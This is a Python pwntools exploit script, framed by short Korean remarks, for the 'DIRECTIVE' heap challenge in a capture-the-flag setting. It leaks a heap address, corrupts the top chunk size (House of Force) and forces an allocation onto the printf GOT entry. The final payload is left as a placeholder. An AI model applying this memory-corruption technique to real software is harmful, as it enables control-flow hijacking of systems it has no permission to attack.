( 100% 분석되어 있는 idb 파일 있습니다 )
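#!/usr/bin/python
"""House of Force exploit driver for the 'DIRECTIVE' heap challenge (32-bit target, Python 2 original).

Flow, exactly as in the original script:
  1. log in with the challenge password,
  2. HeapLeak(): walk the menu until the program prints a heap address,
  3. HoFTrigger(): overflow into the top chunk, set its size to 0xffffffff,
     request a chunk of the size that makes the *next* allocation land on the
     printf GOT slot, then write EIP there.

The libc leak and the final payload are not implemented: "RET!" is only a
placeholder written over printf@GOT.  Every constant below (host/port,
password, GOT address, overflow length, +4 leak adjustment) is specific to one
binary and was taken from the original script, not derived here; re-check them
against the target before reuse.
"""
from __future__ import print_function

from pwn import *
from struct import *

HOST = 'localhost'
PORT = 4000
PASSWORD = "314ckC47"       # challenge login, hard-coded in the original
PRINTF_GOT = 0x0804d010     # write target ('printf()' GOT entry per the original comment)
OVERFLOW_LEN = 896 + 32     # filler bytes before the 0xffffffff lands (top chunk size, presumably)
CHUNK_HDR = 0x8             # 32-bit glibc chunk header (prev_size + size), the "- 0x8" of the original

conn = remote(HOST, PORT)
conn.sendline(PASSWORD)


def hof_size(target, topchunk):
    """Return the request size that moves the top chunk onto `target`.

    House of Force: once the top chunk's size is 0xffffffff, a malloc() of
    (target - header - top) makes the top pointer equal `target`, so the
    following allocation is served from `target` itself.  The difference is
    negative here (the GOT lies below the heap); masking to 32 bits yields the
    same two's-complement value the target's size_t arithmetic sees and avoids
    the struct.error that pack(">l", ...) raises for out-of-range values.
    """
    return (target - CHUNK_HDR - topchunk) & 0xffffffff


def HoFTrigger(EIP, topchunk, target=PRINTF_GOT):
    """Run the House of Force sequence and drop into an interactive session.

    EIP      : data written into the chunk malloc() hands out at `target`
               (the original passes the placeholder "RET!").
    topchunk : address of the current top chunk (HeapLeak() + 4 in the caller).
    target   : address the forced allocation should land on; defaults to the
               printf GOT slot of the original binary.

    Menu letters and prompt strings are those of the original script and are
    sent blind (no recvuntil) except for the "DIRECTIVE" prompt, as before.
    """
    ovaddr = hof_size(target, topchunk)
    # Same 8 hex digits as pack(">l", ovaddr).encode('hex') produced originally.
    size_hex = "%08x" % ovaddr

    conn.sendline("c")
    conn.sendline("n")
    conn.sendline("g")
    # Overflow: filler up to the header, then size = 0xffffffff so glibc's
    # top-chunk size check passes for any request.  bytes literal so the
    # 0xff bytes are sent raw under both Python 2 and 3.
    conn.sendline(b"A" * OVERFLOW_LEN + b"\xff\xff\xff\xff")
    conn.sendline("q")
    conn.sendline("g")
    print("[*] Calculated :", hex(ovaddr), size_hex)
    conn.sendline(size_hex)
    conn.sendline("")
    print(conn.recvuntil("DIRECTIVE"))
    conn.sendline("g")
    conn.sendline("100")   # the follow-up allocation; its buffer now starts at `target`
    conn.sendline(EIP)     # lands on printf@GOT -> the next printf() call jumps to EIP
    conn.interactive()


def HeapLeak():
    """Drive the menu until the program prints a heap pointer; return it as an int.

    The letter/prompt pairs are those of the original script; the program is
    expected to print "(null)\\n<decimal>-..." and the decimal before '-' is
    the leak.  Raises ValueError (with the offending text) if that field is
    not a decimal integer, instead of the bare int() failure of the original.
    """
    steps = [
        ("c", "[q]uit"),
        ("n", "[q]uit"),
        ("a", "?"),
        ("basil", ":"),
        ("0", "[q]uit"),
        ("d", "[q]uit"),
        ("p", "(null)\n"),
    ]
    for line, prompt in steps:
        conn.sendline(line)
        conn.recvuntil(prompt)
    leaked = conn.recvuntil("-")[:-1]
    try:
        addr = int(leaked)
    except ValueError:
        raise ValueError("unexpected leak text %r before '-'" % (leaked,))
    conn.sendline("q")
    conn.recvuntil("[q]uit")
    return addr


# The original adds 4 to the leak and calls the result the top chunk address;
# the reason for the offset is not stated there.
Target = HeapLeak() + 4
print("[*] Top Chunk Leaked : " + hex(Target))
# "RET!" is a placeholder: without a libc leak there is no real address to write.
HoFTrigger("RET!", Target)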
아쉽게도 라이브러리(libc) 오프셋을 릭하기 귀찮아서 끝까지 풀지 않았습니다. (위 스크립트에서 printf@GOT에 써 넣는 "RET!"는 실제 주소 대신 넣어 둔 placeholder입니다.)